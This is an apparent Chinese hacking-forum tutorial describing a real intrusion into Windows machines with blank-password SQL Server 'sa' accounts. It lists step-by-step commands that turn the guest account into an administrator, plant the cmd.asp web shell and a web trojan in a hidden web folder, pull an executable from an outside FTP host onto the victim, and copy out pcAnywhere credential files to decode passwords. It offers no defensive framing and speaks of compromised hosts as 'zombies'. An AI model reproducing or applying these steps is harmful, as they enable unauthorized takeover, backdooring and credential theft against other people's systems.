lcx的win98下sa空密码入侵脚本20步

前言，这是我两天入侵两台sa空密码主机的真实总结:
1.如何找到sa空密码肉鸡？自己用流光扫吧。
2.注意这是在win98下入侵sa的真实情况。局域网中的win98，在网吧里。
3.工具：supersqlexec.exe、cmd.asp(www.sandflee.net有下)海阳顶端网木马(黑白)放在本机f:盘
4.用supersqlexec联接成功。在命令行中输入:
net user guest /active:yes
（>指肉鸡显示下同）The command completed successfully.
net user guest 123456
> The command completed successfully
net localgroup administrators guest /add
> The command completed successfully.
这几个命令做完后，意思是将guest用户激活，密码是123456，并提升为admin。
5.心中暗喜，下一步启动流光的种植者给它种个冰河。奇怪了，无论如何也不成功。
6.换个用户名吧。回到supersqlexe.exe的命令模式net user lcx 123456 /add，命令失败。服务器没开ipc$?
7.回到sqlexe命令行中net start lanmanserver肉鸡却显示ipc$已启动。为何在这一步流光联不上，我百思 不得其解。我后来换wn2000的cmd下net use \\ip\ipc$ "123456" /user:"guest"也不能联接成功。
8.换个思路吧。在本机上将f:设为共享,在dos下ipconfig.exe得知自己本机ip
9.回到sqlexe命令行中net use x: \\本机ip\f，将自己本机f：盘映射成为肉鸡的x:盘。过了一会，服务器显 示命令成功完成。
10.sqlexe命令行中运行set得知其主页位置在d:\inetpub\wwwroot。不错，服务器支持asp.你如果看不懂这个 命令，也可以根据其主页上某个图像文件名，然后dir *.jpg/s查找其主页位置。
11.sqlexe命令行中copy x:\cmd.asp d:\inetpub\wwwroot
12.回到ie中http://服务器ip/cmd.asp，出现了ie界面的dos.建个文件夹看看。md d:\inetpub\wwwroot\aspmm
13.sqlexec命令行中copy x:\海阳顶端网木马\*.* d:\inetpub\wwwroot\aspmm\.再将目录隐藏attrib +h d:\inetpub\wwwroot\aspmm
14.现在你可以用海阳顶端网木马上传任意文件了。完全控制了肉鸡的文本文件。当然你也可以通过映射来 copy.呀！这台服务器不支持fso，海阳顶端网木马无法运行。试一下ftp上传。先将自己的文件lcx.exe上传 到个人主页空间。
15.在自己本机上建立up.txt内容如下：
open ftp1.go.163.com(我用得是网易ftp)
username(你的上传用户名)
password(密码)
get lcx.exe(你要上传到肉鸡的文件名)
bye(退出ftp)
通过映射copy到肉鸡的c:\up.txt
16.sqlexec命令行中ftp -s:c:\up.txt等一会你就看到lcx.exe已经在肉鸡在\winnt\system32\下了。
17.运气好的话应该可以ipc联接成功，开个端口进去的。然后就可以做个代理、做个跳板了，可惜我运气不好 ，这台机器无法ipc$成功，流光种植者无法联接。上传了好几个exe木马也无法运行。
18. 通过仔细查找，得知肉鸡装了pcanywhere.查*.cif，该文件却在C:/WINNT/Profiles/All Users/Application Data/Symantec/pcAnywhere这里，好深的目录。怎样copy它呢？
19.通过一天的dos8.3规则的补习才知应是这样 :copyc:\winnt\Profiles\alluse~1\applic~2\symantec\pcanyw~1\*.cif d:\inetpub\wwwroot\.然后通过 ie下载。
20.流光cif文件解码，得知用户名和密码。唯一遗憾的是ipc$无法成功，无法开端口进去，guest用户却可以 激活不知什么原因，望高手指点。

手工检测网站是否存在webdav漏洞：【上一篇】
利用cmd躲过肉鸡病毒防火墙的方法：【下一篇】